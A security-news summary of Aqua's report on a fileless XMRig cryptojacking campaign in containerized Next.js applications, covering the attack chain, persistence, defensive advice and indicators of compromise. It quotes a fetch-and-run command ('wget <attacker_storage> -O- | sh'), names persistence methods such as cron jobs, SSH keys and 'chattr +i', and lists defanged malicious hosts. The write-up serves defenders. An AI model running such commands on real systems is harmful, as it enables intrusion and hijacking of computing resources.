Aqua Details Fileless Cryptomining Campaign Targeting Containerized Apps

· Original article ↗

Summary

Aqua describes a multistage XMRig cryptojacking campaign in containerized Node.js applications, including memory-based execution, persistence and mining traffic. The exact initial exploit was not determined, and Aqua found no evidence of access to customer secrets.

Key points

  • Aqua’s telemetry identified the campaign in containerized Node.js applications built with Next.js; the exact exploit used for initial access could not be confirmed.
  • The attacker ran a script piped directly from a remote host, then unpacked a loader into memory through a memfd artifact before deploying the miner.
  • The campaign established persistence with cron jobs, init scripts, shell profile changes and an SSH key; processes used names resembling legitimate services.
  • The XMRig miner communicated with a known Monero mining pool over a standard port. In a later phase, the attacker used chattr +i to hinder file removal.
  • Aqua reported no evidence that customer secrets, tokens or keys were accessed. The article lists file hashes and staging and command infrastructure as indicators of compromise.
  • The article describes runtime controls for blocking fileless execution and new binaries, detecting mining behavior and associating outbound connections with the processes that generate them.

Article Details

Attack Vectors
  • Aqua observed malicious execution through Node.js processes in containerized Next.js applications. It described initial execution as occurring through a Next.js exploit, but said the telemetry did not identify the exact exploit.
  • The attacker used `wget <attacker_storage> -O- | sh` to fetch and run a first-stage script without saving it to disk. The script fetched a packed loader that unpacked into memory and executed from `memfd:upX`; the cryptominer was later dropped to disk.
  • The attacker introduced binaries absent from the original container image and ran hidden executables and guard or watchdog processes to maintain the miner.
  • Persistence included cron jobs, rc.d init scripts, shell profile changes and an installed SSH key. The attacker later used `chattr +i` to make key files immutable.
  • The XMRig miner made an outbound connection to a Monero mining pool. The article does not disclose that pool's destination.
Defensive Notes
  • Aqua recommends enabling Drift Prevention in enforcement mode for baselined workloads and enabling Block Fileless Execution where memory-resident execution is not expected.
  • Aqua recommends correlating cryptomining detections and outbound connections with the processes generating them, and reviewing authorized_keys and other persistence locations for unexpected changes.
  • The article describes where Aqua's enforcement policies can block execution or mining traffic; it does not establish that each policy blocked this observed attack.
  • Aqua reported finding no evidence that the attacker accessed customer secrets, tokens or keys.

Indicators of compromise

TypeIndicatorContext
HOSTNAMEcts-assets[.]s3[.]us-west-1[.]amazonaws[.]comSpecific S3 bucket hostname identified as hosting the grep2.jpg stager.
HOSTNAMEredclub-websites-offer-images[.]s3[.]amazonaws[.]comSpecific S3 bucket hostname identified as hosting the grep2.jpg stager.
SHA25672987d9755dbd12117a23f337054edcc51629563c3ff867fd65ccb948775d546SHA-256 of a packed stage.
SHA25682258b64b331d1f0d345292b69da6e6f4381e8c7249654140b2c1167353b534bSHA-256 of the malware loader.
SHA25683a9d43c3d37983a551d4b525829b40e8af4de49cfc9524156400f983fd49699SHA-256 of a hidden executable.
SHA256b20f39fc00d242e706b6c30367ad811c676e0575050a4ec2f30104b696944b49SHA-256 of the XMRig miner identified at /tmp/nodes.
SHA256fce7781a199f2b65bdb47dac602ecf397941235670818e79e5d9a9d0fa4cceeaSHA-256 of a packed stage.
SHA256ff990066f7860be6f2893550e58c0ab485c330edc8a4a55a289557004eb9ef99SHA-256 of a nested Go packer.
URLhxxp[:]//185[.]216[.]75[.]152Address listed under C2 and staging infrastructure; its specific role is not disclosed.
URLhxxp[:]//221[.]156[.]167[.]200:9090/js/Stage-one and payload server listed under C2 and staging infrastructure.
URLhxxp[:]//77[.]90[.]13[.]20/dashboardPayload host listed under C2 and staging infrastructure.

MITRE ATT&CK

Malware

Vendors

Products

Related Articles